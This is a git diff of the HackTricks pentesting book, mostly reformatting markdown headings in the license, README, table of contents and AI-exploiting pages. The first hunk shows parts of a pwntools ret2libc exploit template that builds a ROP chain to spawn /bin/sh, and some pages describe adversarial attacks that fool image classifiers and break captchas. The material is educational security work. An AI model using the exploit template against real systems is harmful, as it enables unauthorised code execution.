diff --git a/.gitbook/assets/template.py b/.gitbook/assets/template.py
index 8f889b5e..f26b4a85 100644
--- a/.gitbook/assets/template.py
+++ b/.gitbook/assets/template.py
@@ -1,9 +1,9 @@
from pwn import * # Import pwntools
-####################
-#### CONNECTION ####
-####################
+###################
+### CONNECTION ####
+###################
LOCAL = True
REMOTETTCP = False
REMOTESSH = False
@@ -36,9 +36,9 @@ if GDB:
gdb.attach(p.pid, "continue")
-####################
-#### Find offset ###
-####################
+###################
+### Find offset ###
+###################
OFFSET = "A"*40
if OFFSET == "":
gdb.attach(p.pid, "c") #Attach and continue
@@ -51,9 +51,9 @@ if OFFSET == "":
exit()
-#####################
-#### Find Gadgets ###
-#####################
+####################
+### Find Gadgets ###
+####################
PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
MAIN_PLT = elf.symbols['main']
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
@@ -93,9 +93,9 @@ if libc == "":
# this implies that in the future if you search for functions in libc, the resulting address
# will be the real one, you can use it directly (NOT NEED TO ADD AGAINF THE LIBC BASE ADDRESS)
-#################################
-### GET SHELL with known LIBC ###
-#################################
+################################
+## GET SHELL with known LIBC ###
+################################
BINSH = next(libc.search("/bin/sh")) #Verify with find /bin/sh
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]
@@ -108,5 +108,5 @@ rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
p.clean()
p.sendline(rop2)
-##### Interact with the shell #####
+#### Interact with the shell #####
p.interactive() #Interact with the conenction
\ No newline at end of file
diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md
index b4016d9c..2875b54f 100644
--- a/1911-pentesting-fox.md
+++ b/1911-pentesting-fox.md
@@ -16,7 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## 1911 - Pentesting fox
And more services:
diff --git a/6881-udp-pentesting-bittorrent.md b/6881-udp-pentesting-bittorrent.md
index 6bd5fe4d..eb7ae3e4 100644
--- a/6881-udp-pentesting-bittorrent.md
+++ b/6881-udp-pentesting-bittorrent.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# 6881/udp - Pentesting BitTorrent
-
diff --git a/LICENSE.md b/LICENSE.md
index 45bfd7fc..d2abc377 100644
--- a/LICENSE.md
+++ b/LICENSE.md
@@ -24,13 +24,13 @@ Human Readable License: https://creativecommons.org/licenses/by-nc/4.0/
Complete Legal Terms: https://creativecommons.org/licenses/by-nc/4.0/legalcode
Formatting: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown
-## creative commons
+# creative commons
# Attribution-NonCommercial 4.0 International
Creative Commons Corporation (“Creative Commons”) is not a law firm and does not provide legal services or legal advice. Distribution of Creative Commons public licenses does not create a lawyer-client or other relationship. Creative Commons makes its licenses and related information available on an “as-is” basis. Creative Commons gives no warranties regarding its licenses, any material licensed under their terms and conditions, or any related information. Creative Commons disclaims all liability for damages resulting from their use to the fullest extent possible.
-### Using Creative Commons Public Licenses
+## Using Creative Commons Public Licenses
Creative Commons public licenses provide a standard set of terms and conditions that creators and other rights holders may use to share original works of authorship and other material subject to copyright and certain other rights specified in the public license below. The following considerations are for informational purposes only, are not exhaustive, and do not form part of our licenses.
@@ -38,11 +38,11 @@ Creative Commons public licenses provide a standard set of terms and conditions
* __Considerations for the public:__ By using one of our public licenses, a licensor grants the public permission to use the licensed material under specified terms and conditions. If the licensor’s permission is not necessary for any reason–for example, because of any applicable exception or limitation to copyright–then that use is not regulated by the license. Our licenses grant only permissions under copyright and certain other rights that a licensor has authority to grant. Use of the licensed material may still be restricted for other reasons, including because others have copyright or other rights in the material. A licensor may make special requests, such as asking that all changes be marked or described. Although not required by our licenses, you are encouraged to respect those requests where reasonable. [More considerations for the public](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees).
-## Creative Commons Attribution-NonCommercial 4.0 International Public License
+# Creative Commons Attribution-NonCommercial 4.0 International Public License
By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-NonCommercial 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions.
-### Section 1 – Definitions.
+## Section 1 – Definitions.
a. __Adapted Material__ means material subject to Copyright and Similar Rights that is derived from or based upon the Licensed Material and in which the Licensed Material is translated, altered, arranged, transformed, or otherwise modified in a manner requiring permission under the Copyright and Similar Rights held by the Licensor. For purposes of this Public License, where the Licensed Material is a musical work, performance, or sound recording, Adapted Material is always produced where the Licensed Material is synched in timed relation with a moving image.
@@ -68,7 +68,7 @@ k. __Sui Generis Database Rights__ means rights other than copyright resulting f
l. __You__ means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning.
-### Section 2 – Scope.
+## Section 2 – Scope.
a. ___License grant.___
@@ -100,7 +100,7 @@ b. ___Other rights.___
3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In all other cases the Licensor expressly reserves any right to collect such royalties, including when the Licensed Material is used other than for NonCommercial purposes.
-### Section 3 – License Conditions.
+## Section 3 – License Conditions.
Your exercise of the Licensed Rights is expressly made subject to the following conditions.
@@ -130,7 +130,7 @@ a. ___Attribution.___
4. If You Share Adapted Material You produce, the Adapter's License You apply must not prevent recipients of the Adapted Material from complying with this Public License.
-### Section 4 – Sui Generis Database Rights.
+## Section 4 – Sui Generis Database Rights.
Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material:
@@ -142,7 +142,7 @@ c. You must comply with the conditions in Section 3(a) if You Share all or a sub
For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights.
-### Section 5 – Disclaimer of Warranties and Limitation of Liability.
+## Section 5 – Disclaimer of Warranties and Limitation of Liability.
a. __Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.__
@@ -150,7 +150,7 @@ b. __To the extent possible, in no event will the Licensor be liable to You on a
c. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability.
-### Section 6 – Term and Termination.
+## Section 6 – Term and Termination.
a. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically.
@@ -166,13 +166,13 @@ c. For the avoidance of doubt, the Licensor may also offer the Licensed Material
d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.
-### Section 7 – Other Terms and Conditions.
+## Section 7 – Other Terms and Conditions.
a. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed.
b. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License.
-### Section 8 – Interpretation.
+## Section 8 – Interpretation.
a. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License.
diff --git a/Learning & Hacking.md b/Learning & Hacking.md
index 2b3d865d..b05d0e7e 100644
--- a/Learning & Hacking.md
+++ b/Learning & Hacking.md
@@ -1,24 +1,24 @@
# Learning Pages and VMs
-## https://tryhackme.com/
+# https://tryhackme.com/
Tryhackme is a platform with virtual machines that need to be solved through walkthroughs, which is very good for beginners and normal CTFs where you self must hack into the machines.
-## https://www.root-me.org/
+# https://www.root-me.org/
Rootme is another page for online hosted virtual machines to hack.
-## https://www.vulnhub.com/
+# https://www.vulnhub.com/
Vulnhub has machines to download and then to hack
-## https://www.hackthebox.eu/ https://academy.hackthebox.eu/catalogue
+# https://www.hackthebox.eu/ https://academy.hackthebox.eu/catalogue
Hackthebox has online machines to hack, but there are very limited in the free version.
@@ -26,26 +26,26 @@ Recently the launched their academy, but it is a bit more expensive than for exa
-## https://hack.me/
+# https://hack.me/
This site seems to be a community platform
-## https://www.hacker101.com/
+# https://www.hacker101.com/
Free and smale site with videos and CTFs
-## https://crackmes.one/
+# https://crackmes.one/
This site has a lot of binarys for forensic learning.
-## https://overthewire.org/wargames/
+# https://overthewire.org/wargames/
The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games.
Perfect for beginners.
-## https://www.hackthissite.org/missions/basic/
+# https://www.hackthissite.org/missions/basic/
-## https://attackdefense.com/
+# https://attackdefense.com/
diff --git a/README.md b/README.md
index 3ad1865c..e95afa4b 100644
--- a/README.md
+++ b/README.md
@@ -22,7 +22,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-## HackTricks
@@ -30,13 +29,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
Here you can find a little **introduction:**
-### [**Pentesting Methodology**](pentesting-methodology.md)
+## [**Pentesting Methodology**](pentesting-methodology.md)
Here you will find the **typical flow** that **you should follow when pentesting** one or more **machines**.
**Click in the title to start!**
-### Support HackTricks
+## Support HackTricks
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
@@ -46,9 +45,9 @@ And if you are a PEASS & HackTricks enthusiast, you can get your hands now on ou
You can also, **join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **to learn about latest news in cybersecurity and meet other cybersecurity enthusiasts**, or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
-### Corporate Sponsors
+## Corporate Sponsors
-#### [STM Cyber](https://www.stmcyber.com)
+### [STM Cyber](https://www.stmcyber.com)
 (1) (1) (1).png>)
@@ -58,7 +57,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
**STM Cyber** also support cybersecurity open source projects like HackTricks :)
-#### [Intrigiti](https://www.intigriti.com)
+### [Intrigiti](https://www.intigriti.com)
.png>)
@@ -68,7 +67,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
{% embed url="https://go.intigriti.com/hacktricks" %}
-#### [**INE**](https://ine.com)
+### [**INE**](https://ine.com)
@@ -84,7 +83,7 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** (and their *
[ine-courses-and-elearnsecurity-certifications-reviews.md](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md)
{% endcontent-ref %}
-### License
+## License
**Copyright © Carlos Polop 2021. Except where otherwise specified (the external information copied into the book belongs to the original authors), the text on** [**HACK TRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop is licensed under the**[ **Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)**](https://creativecommons.org/licenses/by-nc/4.0/)**.**\
**If you want to use it with commercial purposes, contact me.**
diff --git a/SUMMARY.md b/SUMMARY.md
index 91e515ef..d2d23c99 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -15,7 +15,7 @@
* [Tunneling and Port Forwarding](tunneling-and-port-forwarding.md)
* [Search Exploits](search-exploits.md)
-## Shells
+# Shells
* [Shells (Linux, Windows, MSFVenom)](shells/shells/README.md)
* [MSFVenom - CheatSheet](shells/shells/msfvenom.md)
@@ -23,7 +23,7 @@
* [Shells - Linux](shells/shells/linux.md)
* [Full TTYs](shells/shells/full-ttys.md)
-## Linux/Unix
+# Linux/Unix
* [Checklist - Linux Privilege Escalation](linux-unix/linux-privilege-escalation-checklist.md)
* [Linux Privilege Escalation](linux-unix/privilege-escalation/README.md)
@@ -62,7 +62,7 @@
* [Bypass Bash Restrictions](linux-unix/useful-linux-commands/bypass-bash-restrictions.md)
* [Linux Environment Variables](linux-unix/linux-environment-variables.md)
-## MacOS
+# MacOS
* [MacOS Security & Privilege Escalation](macos/macos-security-and-privilege-escalation/README.md)
* [Mac OS Architecture](macos/macos-security-and-privilege-escalation/mac-os-architecture.md)
@@ -73,7 +73,7 @@
* [MacOS Serial Number](macos/macos-security-and-privilege-escalation/macos-serial-number.md)
* [MacOS Apps - Inspecting, debugging and Fuzzing](macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md)
-## Windows
+# Windows
* [Checklist - Local Windows Privilege Escalation](windows/checklist-windows-privilege-escalation.md)
* [Windows Local Privilege Escalation](windows/windows-local-privilege-escalation/README.md)
@@ -138,7 +138,7 @@
* [PowerView](windows/basic-powershell-for-pentesters/powerview.md)
* [AV Bypass](windows/av-bypass.md)
-## Mobile Apps Pentesting
+# Mobile Apps Pentesting
* [Android APK Checklist](mobile-apps-pentesting/android-checklist.md)
* [Android Applications Pentesting](mobile-apps-pentesting/android-app-pentesting/README.md)
@@ -185,7 +185,7 @@
* [iOS UIPasteboard](mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md)
* [iOS WebViews](mobile-apps-pentesting/ios-pentesting/ios-webviews.md)
-## Pentesting
+# Pentesting
* [Pentesting Network](pentesting/pentesting-network/README.md)
* [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
@@ -365,7 +365,7 @@
* [50030,50060,50070,50075,50090 - Pentesting Hadoop](pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md)
* [Pentesting Remote GdbServer](pentesting/pentesting-remote-gdbserver.md)
-## Pentesting Web
+# Pentesting Web
* [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
* [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md)
@@ -474,7 +474,7 @@
* [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
* [XS-Search](pentesting-web/xs-search.md)
-## Forensics
+# Forensics
* [Basic Forensic Methodology](forensics/basic-forensic-methodology/README.md)
* [Baseline Monitoring](forensics/basic-forensic-methodology/file-integrity-monitoring.md)
@@ -508,7 +508,7 @@
* [Windows Processes](forensics/basic-forensic-methodology/windows-forensics/windows-processes.md)
* [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md)
-## Cloud Security
+# Cloud Security
* [GCP Security](cloud-security/gcp-security/README.md)
* [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md)
@@ -559,7 +559,7 @@
* [Cloud Security Review](cloud-security/cloud-security-review.md)
* [AWS Security](cloud-security/aws-security.md)
-## A.I. Exploiting
+# A.I. Exploiting
* [BRA.I.NSMASHER Presentation](a.i.-exploiting/bra.i.nsmasher-presentation/README.md)
* [Basic Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md)
@@ -569,16 +569,16 @@
* [ML Basics](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md)
* [Feature Engineering](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md)
-## Blockchain
+# Blockchain
* [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md)
* [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md)
-## Courses and Certifications Reviews
+# Courses and Certifications Reviews
* [INE Courses and eLearnSecurity Certifications Reviews](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md)
-## Physical attacks
+# Physical attacks
* [Physical Attacks](physical-attacks/physical-attacks.md)
* [Escaping from KIOSKs](physical-attacks/escaping-from-gui-applications/README.md)
@@ -587,7 +587,7 @@
* [Bootloader testing](physical-attacks/firmware-analysis/bootloader-testing.md)
* [Firmware Integrity](physical-attacks/firmware-analysis/firmware-integrity.md)
-## Reversing
+# Reversing
* [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
* [Angr](reversing/reversing-tools-basic-methods/angr/README.md)
@@ -600,7 +600,7 @@
* [Unpacking binaries](reversing/cryptographic-algorithms/unpacking-binaries.md)
* [Word Macros](reversing/word-macros.md)
-## Exploiting
+# Exploiting
* [Linux Exploiting (Basic) (SPA)](exploiting/linux-exploiting-basic-esp/README.md)
* [Format Strings Template](exploiting/linux-exploiting-basic-esp/format-strings-template.md)
@@ -614,7 +614,7 @@
* [PwnTools](exploiting/tools/pwntools.md)
* [Windows Exploiting (Basic Guide - OSCP lvl)](exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
-## Cryptography
+# Cryptography
* [Certificates](cryptography/certificates.md)
* [Cipher Block Chaining CBC-MAC](cryptography/cipher-block-chaining-cbc-mac-priv.md)
@@ -624,19 +624,19 @@
* [Padding Oracle](cryptography/padding-oracle-priv.md)
* [RC4 - Encrypt\&Decrypt](cryptography/rc4-encrypt-and-decrypt.md)
-## BACKDOORS
+# BACKDOORS
* [Merlin](backdoors/merlin.md)
* [Empire](backdoors/empire.md)
* [Salseo](backdoors/salseo.md)
* [ICMPsh](backdoors/icmpsh.md)
-## Stego
+# Stego
* [Stego Tricks](stego/stego-tricks.md)
* [Esoteric languages](stego/esoteric-languages.md)
-## MISC
+# MISC
* [Basic Python](misc/basic-python/README.md)
* [venv](misc/basic-python/venv.md)
@@ -647,7 +647,7 @@
* [Bruteforce hash (few chars)](misc/basic-python/bruteforce-hash-few-chars.md)
* [Other Big References](misc/references.md)
-## TODO
+# TODO
* [More Tools](todo/more-tools.md)
* [MISC](todo/misc.md)
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer.md
index 2b1f6c97..ab33c4f7 100644
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/BIM_Bruteforcer.md
@@ -17,18 +17,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-#BRUTEFORCER CORE SCRIPT WITH BIM ATTACK
-
-This time we introduce a new type of gradient based attack, in order to brute force an image classification app (can be shaped and used for any input of course), the BIM, or Basic Iteration Method.
-
-It's reccomended to see at least the explanation in the [**introduction challenge colab Notebook**](//https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR)
-
-To go deeper on the BIM topic:
-https://arxiv.org/pdf/1607.02533.pdf
-
-As usual we will provide only the A.I. attack core part, it's up to you to complete the tool and blending it with PT techniques, depending on the situations.
-
-Please Note:
+This time we introduce a new type of gradient based attack, in order to brute force an image classification app (can be shaped and used for any input of course), the BIM, or Basic Iteration Method.
+
+It's reccomended to see at least the explanation in the [**introduction challenge colab Notebook**](//https://colab.research.google.com/drive/1lDh0oZ3TR-z87WjogdegZCdtsUuDADcR)
+
+To go deeper on the BIM topic:
+https://arxiv.org/pdf/1607.02533.pdf
+
+As usual we will provide only the A.I. attack core part, it's up to you to complete the tool and blending it with PT techniques, depending on the situations.
+
+Please Note:
Remeber, in those kind of scenarios, in order to mime real-based attack applications, we don't have the exact model to fool or the image target in which we would like to transform our image. That's why, in order to overcome this issue, we must blend our core script, with a bruteforcer logic, accordingly to the application responses we want to fool.
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/Hybrid_Malware_Classifier_Part_1.md b/a.i.-exploiting/bra.i.nsmasher-presentation/Hybrid_Malware_Classifier_Part_1.md
index d3589144..0c3f5913 100644
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/Hybrid_Malware_Classifier_Part_1.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/Hybrid_Malware_Classifier_Part_1.md
@@ -1,40 +1,38 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-#A.I. HYBRID MALWARE CLASSIFIER
-##INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS (Part 1)
-
-In this series of notebook we are going to build an **hybrid malware classifier.**
-
-For the **First part** we will focus on the scripting that involves dynamic analysis. Any steps of this series will come useful in order to detect malwares, and in this piece we will try to classify them based on their behaviour, utilizing the logs produced by running a program.
-
-In the **Second Part** we will see how to manipulate the logs files in order to add robustness to our classifier and adjust the code to counter the more advanced methods of A.I. Malware Evasion.
-
-In the **Third Part** we will create a Static Malware Classifier.
-
-For the **Fourth Part** For the Fourth Part we will add some tactics to add robustness to our Static classifier and merge the latter with our Dynamic Classifier.
-
-**PLEASE NOTE:** This Series strongly relies on building a dataset on your own, even if it's not mandatory.
-There are also many available datasets for Static and/ or Dynamic Malware analysis on several sites for this type of classification, like Ember, VirusShare, Sorel-20M, but i strongly encourage that you build one or your own.
-
-Here's the link to our [**colab notebook**](https://colab.research.google.com/drive/1nNZLMogXF-iq-_78IvGTd-c89_C82AB8#scrollTo=lUHLMl8Pusrn) enjoy and stay safe :)
-
+
+
+
+
+Support HackTricks and get benefits!
+
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+
+Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+
+Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+
+**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+
+
+#INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS (Part 1)
+
+In this series of notebook we are going to build an **hybrid malware classifier.**
+
+For the **First part** we will focus on the scripting that involves dynamic analysis. Any steps of this series will come useful in order to detect malwares, and in this piece we will try to classify them based on their behaviour, utilizing the logs produced by running a program.
+
+In the **Second Part** we will see how to manipulate the logs files in order to add robustness to our classifier and adjust the code to counter the more advanced methods of A.I. Malware Evasion.
+
+In the **Third Part** we will create a Static Malware Classifier.
+
+For the **Fourth Part** For the Fourth Part we will add some tactics to add robustness to our Static classifier and merge the latter with our Dynamic Classifier.
+
+**PLEASE NOTE:** This Series strongly relies on building a dataset on your own, even if it's not mandatory.
+There are also many available datasets for Static and/ or Dynamic Malware analysis on several sites for this type of classification, like Ember, VirusShare, Sorel-20M, but i strongly encourage that you build one or your own.
+
+Here's the link to our [**colab notebook**](https://colab.research.google.com/drive/1nNZLMogXF-iq-_78IvGTd-c89_C82AB8#scrollTo=lUHLMl8Pusrn) enjoy and stay safe :)
+
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/README.md b/a.i.-exploiting/bra.i.nsmasher-presentation/README.md
index efd4df10..c7e64340 100644
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/README.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/README.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# BRA.I.NSMASHER Presentation
-
-## Presentation
+# Presentation
**BrainSmasher** is a platform made with the purpose of aiding **pentesters, researcher, students, A.I. Cybersecurity engineers** to practice and learn all the techniques for **exploiting commercial A.I.** applications, by working on specifically crafted labs that reproduce several systems, like face recognition, speech recognition, ensemble image classification, autonomous drive, malware evasion, chatbot, data poisoning etc...
@@ -39,7 +37,7 @@ _A big thanks to Hacktricks and Carlos Polop for giving us this opportunity_
> _Walter Miele from BrA.I.nsmasher_
-## Registry Challenge
+# Registry Challenge
In order to register in [**BrA.I.Smasher** ](https://beta.brainsmasher.eu)you need to solve an easy challenge ([**here**](https://beta.brainsmasher.eu/registrationChallenge)).\
Just think how you can confuse a neuronal network while not confusing the other one knowing that one detects better the panda while the other one is worse...
@@ -50,7 +48,7 @@ However, if at some point you **don't know how to solve** the challenge, or **ev
I have to tell you that there are **easier ways** to pass the challenge, but this **solution** is **awesome** as you will learn how to pass the challenge performing an **Adversarial Image performing a Fast Gradient Signed Method (FGSM) attack for images.**
-## More Tutorials
+# More Tutorials
{% content-ref url="basic-captcha-breaker.md" %}
[basic-captcha-breaker.md](basic-captcha-breaker.md)
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md
index c4a3ef9d..8afa804b 100644
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Basic Bruteforcer
-
-## BRUTEFORCER IMAGE CORRUPTION SCRIPT
+# BRUTEFORCER IMAGE CORRUPTION SCRIPT
The purpose here is to introduce the user to some basic concepts about **A.I. apps exploiting**, via some easy to follow scripts, which represents the core for writing useful tools.\
\
In this example (which can be used to solve the easy labs of BrainSmasher) by recalling also what is written in the solution for the introduction challenge, we will provide a simple yet useful way, in order to iteratively produce some corrupted images, to bruteforce the face recon easy labs (and thus also real applications that relies on the same principles)
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md
index 6194e50b..741962e0 100644
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Basic Captcha Breaker
-
In this tutorial **a basic captcha is going to be broken**.
A **NN is going to be trained** using several **images** that represents **letters** and then this NN is going to be used to **automatically identify the letters inside a captcha image**.
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md b/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md
index 3bfcfdd5..7eae9aa0 100644
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# BIM Bruteforcer
-
-## BRUTEFORCER CORE SCRIPT WITH BIM ATTACK
+# BRUTEFORCER CORE SCRIPT WITH BIM ATTACK
This time we introduce a new type of gradient based attack, in order to brute force an image classification app \(can be shaped and used for any input of course\), the BIM, or Basic Iteration Method.
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md b/a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md
index 01067780..523fd0bf 100644
--- a/a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md
+++ b/a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Hybrid Malware Classifier Part 1
+# A.I. HYBRID MALWARE CLASSIFIER
-## A.I. HYBRID MALWARE CLASSIFIER
-
-### INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS \(Part 1\)
+## INTERMEDIATE PYTHON SKILL, INTERMEDIATE MACHINE LEARNING SKILLS \(Part 1\)
In this series of notebook we are going to build an **hybrid malware classifier.**
diff --git a/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md b/a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md
index 2432ebc2..eb7ae3e4 100644
